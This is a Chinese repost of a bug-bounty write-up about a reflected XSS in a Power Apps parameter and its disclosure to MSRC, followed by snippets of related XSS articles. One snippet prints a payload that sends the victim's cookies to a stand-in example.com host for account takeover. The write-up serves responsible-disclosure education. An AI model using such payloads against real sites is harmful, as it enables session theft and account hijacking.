另一处XSS!荣登微软MSRC 2022 Q3排行榜

VSole2023-02-16 09:41:30

背景介绍:

首先来看张图:

图片来自一位泰国的白帽小哥 Supakiad Satuwan,在本文中将讲述他在微软漏洞赏金计划中发现的第一个有效漏洞,因为该漏洞也让其荣登 MSRC 2022 Q3 安全研究员排行榜。废话不多说,走起~

MSRC是个啥?

Microsoft 安全响应中心 (MSRC)是 Microsoft Defender 社区的一部分,处于 Microsoft 安全响应演变的前线,该平台与安全研究人员合作,致力于保护 Microsoft 的客户和更广泛的生态系统。‍

更多详细信息:https://msrc.microsoft.com/

Part 1-寻找目标:

在挖掘微软漏洞赏金之前,白帽小哥先对 Microsoft 赏金计划 | MSRC 范围和计划列表进行了详细阅读,最终决定以 Microsoft Dynamics 365 和 Power Platform Program 作为目标。

Part 2-开始狩猎:

在分析 Power Apps 平台及其上的应用程序时,其中一个应用程序向https://apps.powerapps.com 发送的请求成功引起了白帽的注意

就是下面这串URL:

https://apps.powerapps.com/authflow/authframe?telemetryLocation=global

该页面未显示任何内容,但是,查看 HTML 代码后,发现 telemetryLocation 参数的值被反映在页面中。

于是白帽将telemetryLocation参数的值从global修改为m3ez,结果证明完全可以控制 telemetryLocation 值。

漏洞利用:

分析完该页面后,通过注入 JavaScript Payload 来测试跨站点脚本 (XSS) 的执行情况:

结果发现该页面在没有输入验证或清理机制的情况下成功反映了Payload。

于是将下面的 XSS Payload 注入到 telemetryLocation 参数中:

最终URL为:

https://apps.powerapps.com/authflow/authframe?telemetryLocation=

访问该链接后,XSS Payload 被成功执行!

Part 3-报告漏洞:

在发现并确认目标易受跨站点脚本 (XSS) 攻击后,白帽立即通过 MSRC 门户报告漏洞,这包括以下步骤:

  • 进入MSRC 研究员门户 | 报告漏洞 
  • 输入漏洞详细信息,包括影响、PoC 和证据等,然后,提交表单

4 天后,MSRC 团队回复并确认了漏洞报告。 

同一天,微软赏金团队回复说他们正在审核漏洞报告赏金奖励。

几小时后,收到来自 MSRC 团队的好消息

Part 4 -领取赏金:

在 Microsoft 赏金团队确认资格获得赏金奖励后,他们会询问赏金奖励支付的问题。

注意:目前,微软仅支持通过 Bugcrowd 或 Microsoft Payment Central 发放奖励

几周后,白帽收到了一封来自 Bugcrowd 的电子邮件,其中包含微软漏洞赏金计划的声明以及提交链接。

领取后,成功收到 Microsoft Bug Bounty 项目的第一份奖励

几个月后,白帽小哥的名字登上了2022 Q3 荣誉榜。并在 Microsoft MSRC 季度排行榜上获得了认可,同时会收到一些 MSRC 奖品作为对该成就的奖励!

漏洞披露时间表:

2022 年 9 月 23 日——通过 MSRC 门户发现并报告漏洞

2022 年 9 月 27 日——MSRC 团队确认,MSRC 工单移至 Review/Repro

2022 年 9 月 27 日 — MSRC 状态从 Review / Repro 更改为 Develop

2022 年 12 月 1 日——MSRC 状态更改为预发布和完成

2022 年 12 月 23 日——公开发布安全公告

感谢阅读,白帽小哥的推特:https://twitter.com/Supakiad_Mee

====正文结束====

漏洞挖掘xss
本作品采用《CC 协议》,转载必须注明作者和本文链接
跨站脚本英文全称(Cross Site Scripting跨站脚本),为了不和css层叠样式表(英文全称:Cascading Style Sheets)混淆,因此将跨站脚本缩写为XSS。本期我们讲解一下XSS漏洞原理和利用检测。
ezXSS介绍ezXSS是一款用于渗透测试和漏洞挖掘XSS盲测跨站脚本工具。在演示版本中可能禁用了一些特性。
但当存在存储型XSS时,受害者打开此URL,攻击代码将会被触发,这种情况下便称之为存储型XSS漏洞。在标题处和帖子内容中分别填写payload,填写好之后,应与下图一致填写好内容之后,点击下方的发表按钮,即可进行发帖,发帖成功会弹出一个提示成功,如下图所示?????
xsshelp闲着没事随便写的一个辅助挖掘xss漏洞的工具xsshelp version: 1.0.0Usage: [-ut] [-u url] [-t thread] [-h help]Options: -h this help -t intthread Num -u string a target url
我发现了一个存储的XSS漏洞,我可以通过窃取cookie升级为帐户接管。我的payload目前需要最少的用户交互,只需单击即可。之后,向下滚动并单击取消预约。确保您拦截了此请求。使用以下有效载荷添加消息:"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">您通常会收到一个确认框,确认您的预约已取消,单击确定。即使管理员注销,此cookie也可以轻松重用。这是因为cookie不会过期。影响我能够通过取消我们的预约并包含一条消息来接管一个管理员帐户。这意味着我们必须找到一个具有用户交互的。
在查看电子邮件时,我发现了 Microsoft 的新服务预订。Microsoft booking 允许任何人预订服务/日历时段。此应用程序有两个界面,一个是内部界面,另一个是面向公众的服务页面。我决定深入检查这个应用程序。我尝试插入各种 XSS payload 来触发 xss 但没有成功。现在我的注意力转移到了这个标签上。应用程序有各种保护机制来防止脚本的执行。
在这篇文章中,我将讨论 Microsoft Forms 中反射式跨站点脚本 漏洞的详细信息。它允许用户创建表单和调查,与他人共享,并在集中位置收集响应。但是,我们发现可以将恶意JavaScript代码注入表单中,这些代码可以由毫无戒心的用户执行。我遵循了 MSRC 报告漏洞的准则并提交了我的发现。欲了解更多信息,请参阅:向 MSRC 提交报告的示例 https://www.microsoft.com/en-us/msrc/bounty-example-report-submission微软赏金计划 |微软公司 https://www.microsoft.com/en-us/msrc/bounty?
每个黑客都会遇到这个,第一个赏金。我实际上无法解释它的感觉,但我知道你们中的大多数人都能理解它的感觉。当我们开始在 Web 应用程序安全中进行漏洞赏金时,我们大多数人都会从 XSS开始,故事从这里开始。
记一次NFT平台的存储型XSS和IDOR漏洞这是我在 NFT 市场中发现的一个令人兴奋的安全问题,它允许我通过链接 IDOR 和 XSS 来接管任何人的帐户,以实现完整的帐户接管漏洞。我们能够用我们自己的价值观修改受害者用户的个人资料。现在我们可以提出任何其他请求来执行其他经过身份验证的操作,例如出售艺术品或转让或删除用户的艺术品漏洞披露
大家好,在本文中,我将分享我在2个TikTok资产发现的XSS漏洞。当我决定在TikTok 程序中寻找漏洞 时,我花了1个月的时间寻找这个XSS。当我在TikTok 卖家账户上创建产品时,这个 XSS 发现开始了我在卖家账户的产品名称中插入了 XSS payload。
VSole
网络安全专家